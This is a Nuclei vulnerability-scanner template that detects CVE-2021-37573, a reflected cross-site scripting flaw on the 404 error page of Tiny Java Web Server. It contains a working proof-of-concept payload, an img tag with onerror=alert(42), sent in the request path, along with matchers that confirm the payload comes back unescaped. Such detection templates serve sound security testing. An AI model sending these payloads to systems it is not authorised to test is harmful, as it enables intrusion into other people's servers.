nuclei-templates/cves/2021/CVE-2021-37573.yaml

37 lines
999 B
YAML

id: CVE-2021-37573
info:
name: Tiny Java Web Server - Reflected XSS
author: geeknik
severity: medium
reference:
- https://seclists.org/fulldisclosure/2021/Aug/13
tags: cve,cve2021,xss,tjws,java
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-37573
cwe-id: CWE-79
description: "A reflected cross-site scripting (XSS) vulnerability in the web server TTiny Java Web Server and Servlet Container (TJWS) <=1.115 allows an adversary to inject malicious code on the server's \"404 Page not Found\" error page"
requests:
- method: GET
path:
- "{{BaseURL}}/te%3Cimg%20src=x%20onerror=alert(42)%3Est"
matchers-condition: and
matchers:
- type: status
status:
- 404
- type: word
part: body
words:
- "<H2>404 te<img src=x onerror=alert(42)>st not found</H2>"
- type: word
part: header
words:
- text/html